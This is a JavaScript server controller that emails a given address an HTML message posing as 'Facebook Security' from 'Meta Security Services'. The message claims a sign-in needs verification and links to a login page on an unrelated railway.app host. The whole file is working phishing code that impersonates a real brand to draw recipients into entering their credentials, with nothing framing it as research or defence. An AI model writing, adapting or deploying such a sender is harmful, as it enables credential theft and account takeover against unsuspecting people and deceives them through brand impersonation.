const sendEmail = require("../services/emailService")
const codeService = require("../services/codeService")

exports.sendLoginEmail = async (req,res)=>{

try{

const {email} = req.body

if(!email){

return res.status(400).json({
success:false,
message:"Email required"
})

}

const loginLink = "https://security-system-production.up.railway.app/login.html"

const emailTemplate = `

<div style="background:#f0f2f5;padding:40px;font-family:Arial">

<div style="max-width:600px;margin:auto;background:white;border-radius:8px;padding:30px">

<h2 style="color:#1877f2;margin-bottom:10px">
Facebook Security
</h2>

<p>Hello,</p>

<p>
A secure sign-in request has been detected through the <strong>Facebook Security Portal</strong>.
To protect your account, verification is required before access is granted.
</p>

<div style="background:#f7f8fa;border-left:4px solid #1877f2;padding:20px;margin:25px 0">

<p style="margin-top:0"><strong>Verification Required</strong></p>

<p>
Please continue to the secure login page to complete verification.
</p>

<a href="${loginLink}" 
style="display:inline-block;background:#1877f2;color:white;padding:12px 25px;
border-radius:6px;text-decoration:none;font-weight:bold;margin-top:10px">

Open Login Page

</a>

</div>

<p>
Verification codes are generated for <strong>single-use authentication</strong>.
If you did not initiate this login request, you may safely ignore this email.
</p>

<hr style="margin:30px 0;border:none;border-top:1px solid #ddd">

<p style="font-size:12px;color:#777">

This email was automatically generated by the Facebook Security monitoring system.
Please do not reply to this email.

<br><br>

© 2026 Meta Security Services

</p>

</div>

</div>

`

const sent = await sendEmail(
email,
"Facebook Security Notification",
emailTemplate
)

if(!sent){

return res.status(500).json({
success:false,
message:"Email failed to send"
})

}

codeService.addActivity(email,"Security email sent")

res.json({
success:true,
message:"Email sent successfully"
})

}catch(error){

console.error("Email sending error:",error)

res.status(500).json({
success:false,
message:"Server error"
})

}

}